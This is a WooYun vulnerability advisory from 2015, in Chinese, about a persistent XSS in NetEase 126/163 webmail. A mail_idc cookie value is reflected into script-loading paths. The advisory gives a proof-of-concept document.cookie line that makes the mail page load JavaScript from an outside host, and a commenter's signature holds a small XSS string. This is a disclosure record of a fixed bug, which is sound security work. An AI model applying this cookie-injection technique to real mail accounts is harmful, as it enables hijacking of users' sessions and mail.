当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127985

漏洞标题:【乌云峰会】网易邮箱XSS ROOKIT

相关厂商:网易

漏洞作者: 多多关照

提交时间:2015-07-21 00:41

修复时间:2015-09-08 10:58

公开时间:2015-09-08 10:58

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-25: 厂商已经确认,细节仅向厂商公开
2015-08-04: 细节向核心白帽子及相关领域专家公开
2015-08-14: 细节向普通白帽子公开
2015-08-24: 细节向实习白帽子公开
2015-09-08: 细节向公众公开

简要描述:

163、126均存在此问题。

详细说明:

网易邮箱会将cookie中的mail_idc在源代码中输出,
例如,我们在控制台下输入:
document.cookie="mail_idc=//xsst.sinaapp.com/poc/mail_idc.js#; path=/; domain=126.com; max-age=9999999";
然后登录126邮箱,
看源代码,会发现以下内容
,build:'6.0b1507151536',now:1437401206072,rootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/",cacheRootPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/",cacheJsPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/js/",cacheCssPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/css/",cacheImgPath:"http:////xsst.sinaapp.com/poc/mail_idc.js#/p/js6/6.0b1507151536/img/",
而cacheJsPath这些变量将会被当作外部JS调用,所以导致加载任意外部JS。

1.png


至于如何设置126.com下的cookie,只要找到一个126.com域下的XSS即可。(这里我就不卖这个XSS了,毕竟这种126.com域下的XSS少一个多一个区别不大,留着以后做演示)

漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 多多关照@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-25 10:56

厂商回复:

漏洞已修复,并对类似问题进行排查,感谢您对网易的关注!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-21 00:43 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:134 | 多乌云、多机会!微信公众号: id:a301zls ...)

    原来是你

  2. 2015-07-21 00:57 | 从容 ( 普通白帽子 | Rank:221 漏洞数:74 | Enjoy Hacking Just Because It's Fun :) ...)

    原来是你

  3. 2015-07-21 01:35 | 苏州同程旅游网络科技有限公司(乌云厂商)

    原来是你

  4. 2015-07-21 02:07 | 杯水 ( 路人 | Rank:2 漏洞数:1 )

    原来是你

  5. 2015-07-21 03:00 | 抚琴听海 ( 路人 | Rank:10 漏洞数:5 | 交流qq 752247101)

    原来是你

  6. 2015-07-21 03:01 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    原来是你

  7. 2015-07-21 04:55 | Let a person cry. ( 路人 | Rank:23 漏洞数:2 | xxoo)

    原来是你

  8. 2015-07-21 05:52 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:125 | <a href=javascrip:alert('xss')>s</a> 点...)

    原来是你⊙﹏⊙

  9. 2015-07-21 08:16 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:15 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    不是香草么?

  10. 2015-07-21 08:22 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:15 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    我其实想看毕姥姥(毕月乌)的那东西@毕月乌....

  11. 2015-07-21 09:31 | Wulala ( 普通白帽子 | Rank:223 漏洞数:24 | ^..^ ^..^ ^↓^ ^..^ ^..^)

    终于出来了啊

  12. 2015-07-21 09:38 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    原来是你

  13. 2015-07-21 09:38 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:55 | 收wb 1:5 无限量收 [平台担保]))

    原来是你

  14. 2015-07-21 09:38 | 冰火九天 ( 普通白帽子 | Rank:123 漏洞数:36 | 游走在黑与白的边缘)

    原来是你

  15. 2015-07-21 09:39 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    是你是你就是你

  16. 2015-07-21 09:41 | 甲鱼 ( 路人 | Rank:28 漏洞数:3 | 慢慢爬……)

    是你是你就是你

  17. 2015-07-21 09:52 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:42 | Newbie)

    幕后黑手

  18. 2015-07-21 09:55 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:78 | ★ 梦想这条路踏上了,跪着也要...)

    原来是你

  19. 2015-07-21 10:00 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:75 | [code]心若没有栖息的地方,走到哪里都是在...)

    是我^^^你能把我怎么样^^^^哼哼

  20. 2015-07-21 10:13 | ( 路人 | Rank:17 漏洞数:4 | -->‮)

    执法队已在路上

  21. 2015-07-21 10:17 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:75 | 硬件与无线通信研究方向)

    原来是你

  22. 2015-07-21 10:32 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:75 | [code]心若没有栖息的地方,走到哪里都是在...)

    @‮ 好恶心 打出来的字是反的 你还弄个空白名

  23. 2015-07-21 10:44 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:13 | 道生一,一生二,二生三,三生万物,万物负...)

    坐等躺枪

  24. 2015-07-21 11:22 | print_0x0000 ( 实习白帽子 | Rank:88 漏洞数:22 | 一枚苦逼的农民工.)

    原来是你

  25. 2015-07-21 12:03 | 骸骸 ( 路人 | Rank:20 漏洞数:5 )

    原来是你

  26. 2015-07-21 12:07 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:37 | I'm Me_Fortune)

    是他是他就是他,我们的好朋友小哪吒

  27. 2015-07-21 12:28 | plane636 ( 普通白帽子 | Rank:160 漏洞数:15 )

    原来是你

  28. 2015-07-21 12:43 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:21 )

    原来是你

  29. 2015-07-21 12:56 | cmxz ( 普通白帽子 | Rank:128 漏洞数:2 | )

    置顶了?

  30. 2015-07-21 13:01 | Czzzzzzz ( 路人 | 还没有发布任何漏洞 | o.0)

    原来是你

  31. 2015-07-21 13:07 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    不是我,哈哈

  32. 2015-07-21 13:29 | SunnyDoll ( 实习白帽子 | Rank:32 漏洞数:10 | 职业搬砖工)

    原来是你

  33. 2015-07-21 14:46 | mikecracker ( 路人 | Rank:6 漏洞数:3 | none of my business)

    原来是你

  34. 2015-07-21 15:22 | Master ( 路人 | Rank:29 漏洞数:6 )

    原来是你

  35. 2015-07-21 15:31 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:373 | 某安全公司招聘系统运维、渗透测试、安全运...)

    原来是你

  36. 2015-07-21 15:43 | 虾米 ( 普通白帽子 | Rank:105 漏洞数:13 )

  37. 2015-07-25 11:44 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:21 )

    原来是你

  38. 2015-07-25 11:54 | 大师兄 ( 路人 | 还没有发布任何漏洞 | 每日必关注乌云)

    大片,后排出售3D眼镜。

  39. 2015-07-26 00:38 | Cn-Wolf ( 路人 | Rank:8 漏洞数:2 | 这个人很懒,什么都没有留下!)

    原来是你

  40. 2015-09-08 11:19 | haker_t ( 路人 | Rank:18 漏洞数:3 | 那个什么。。那个。。)

    原来是你

  41. 2015-09-08 12:19 | 明月影 ( 路人 | Rank:12 漏洞数:6 | 学姿势,学思路。)

    留着做演示

  42. 2015-09-08 13:42 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    额,第一次的访问的就是反射型XSS去修改cookie额。。。。

  43. 2015-09-09 09:21 | 路人毛 ( 路人 | Rank:23 漏洞数:10 | 昨晚做梦,挖到了电信都漏洞,被电信起诉了...)

    666

  44. 2015-09-09 09:30 | 大师兄 ( 路人 | 还没有发布任何漏洞 | 每日必关注乌云)

    我也留着以后做演示,哈哈